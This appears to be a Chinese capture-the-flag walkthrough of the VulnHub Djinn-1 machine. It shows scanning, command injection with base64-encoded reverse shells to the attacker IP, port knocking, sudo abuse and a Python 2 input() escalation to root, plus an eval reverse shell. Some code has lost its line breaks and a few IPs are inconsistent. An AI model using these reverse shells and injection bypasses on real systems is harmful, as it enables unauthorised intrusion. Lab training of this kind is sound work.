下载地址:https://download.vulnhub.com/djinn/djinn.ova
攻击者ip:192.168.56.132 桥接(自动) vmare 受害者IP:192.168.56.134 仅主机 wxbox
参考:https://mp.weixin.qq.com/s/IxDe4VFW9iFB0LsfYQZmjA
https://www.cnblogs.com/haohao1/p/16031123.html
主机发现 arp-scan -l
端口扫描 nmap -p- -sV 192.168.56.134
发现开启21ftp端口,尝试匿名登陆,anonymous/anonymous
或者使用nmap -p- -A 192.168.56.134可以直接检测出
提示要完成1000题
扫描目录
dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://192.168.56.134:7331
gobuster dir -u http://192.168.0.106:7331 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
从http://192.168.56.134:7331/wish输入的命令会跳转到
http://192.168.56.134:7331/genie?name=www-data%0A,并且命令的回显是在url上的
尝试反弹shell,但是发现会过滤
/bin/sh -i >& /dev/tcp/192.168.56.132/1111 0>&1
发现echo可以用,尝试编码绕过
echo "Y2F0IC9ldGMvcGFzc3dkCg==" | base64 -d | bash
bash -i >& /dev/tcp/192.168.56.132/1111 0>&1
base64编码
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEzMi8xMTExIDA+JjE=
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEzMi8xMTExIDA+JjE=" | base64 -d | bash
反弹成功
方法2-1337游戏脚本
根据提示回答1000遍问题后会给予礼物,手工输入肯定不行,因此可以编写脚本执行
#coding:utf-8 import logging import telnetlib import time import redef main():try:tn = telnetlib.Telnet('192.168.56.134',port=1337) except:logging.warning("errr")time.sleep(0.5) loop=1 while loop<1002:data = tn.read_very_eager().decode('ascii')print(data) res = re.search('(.*?)s>',data).group(1) datas = str(calc(res)).strip() print(str(loop)+":"+datas) loop=loop+1 tn.write(datas.encode('ascii')+b"n") time.sleep(0.1)data = tn.read_very_eager().decode('ascii')return datadef calc(res):res_str = res.strip('(').strip(")").replace("'","")muns = res_str.split(',')munber1 = muns[0].strip() orperator = muns[1].strip() munber2 = muns[2].strip() res = eval(munber1+orperator+munber2) return resprint(main())
python3 game.py
得到提示1356, 6784, 3409
利用 knock 依次访问1356、6784、3409端口,成功修改防火墙规则
knockd knock 192.168.56.132 1356 6784 3409
目标系统 SSH 服务成功对外开放
nmap -p 22 -sV 192.168.56.132
发现用户
nitish sam
查看文件发现一个txt
nitish:p4ssw0rdStr3r0n9
查看txt,可能是nitish的密码
直接su会有报错
su nitish su: must be run from a terminal
需要先提升shell权限
python -c 'import pty; pty.spawn("/bin/bash")'
提权
sudo -l
发现sam可以不要密码登录
使用man genie查看命令详情
发现-p和-cmd参数
-p失败,sudo -u sam /usr/bin/genie -cmd whoami成功
切换到sam后,可以以root身份执行/root/lago
sudo -u root /root/lago
find / -writable -type f 2>/dev/null
将文件传送到kail
nc -lvnp 2222 > 666.pyc
nc 192.168.56.132 2222 < .pyc
得到如下源码,https://tool.lu/pyc/
#!/usr/bin/env python# visit https://tool.lu/pyc/ for more information# Version: Python 2.7from getpass import getuserfrom os import systemfrom random import randintdef naughtyboi():print "Working on it!! "def guessit():num = randint(1, 101)print "Choose a number between 1 to 100: "s = input("Enter your number: ")if s == num:system("/bin/sh")else:print "Better Luck next time"def readfiles():user = getuser()path = input("Enter the full of the file to read: ")print "User %s is not allowed to read %s" % (user, path)def options():print "What do you want to do ?"print "1 - Be naughty"print "2 - Guess the number"print "3 - Read some damn files"print "4 - Work"choice = int(input("Enter your choice: "))return choicedef main(op):if op == 1:naughtyboi()elif op == 2:guessit()elif op == 3:readfiles()elif op == 4:print "work your ass off!!"else:print "Do something better with your life"if __name__ == "__main__":main(options())
仔细审计一下发现这里有input函数,发现为python2的版本。搜一下python input()vulnerability,看看input函数漏洞,参考文章
https://www.geeksforgeeks.org/vulnerability-input-function-python-2-x/
根据这个漏洞,可以把变量名当成变量的内容来解析,我们可以直接在Guess the number中输入"num"利用此漏洞即可。到这时候我们已经获得root权限
经审计后可知当s等于num时会执行/bin/sh。输入 num 成功提权为 root
提权成功
提权2
eval('__import__("os").system("whoami")')bash -i >& /dev/tcp/192.168.56.132/2222 0>&1eval('__import__("os").system("bash -i >& /dev/tcp/192.168.56.132/2222 0>&1")')YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEzMi8yMjIyIDA+JjE=eval('__import__("os").system("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEzMi8yMjIyIDA+JjE= | base64 -d | bash")')
原文始发于微信公众号(王之暴龙战神):Djinn-1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论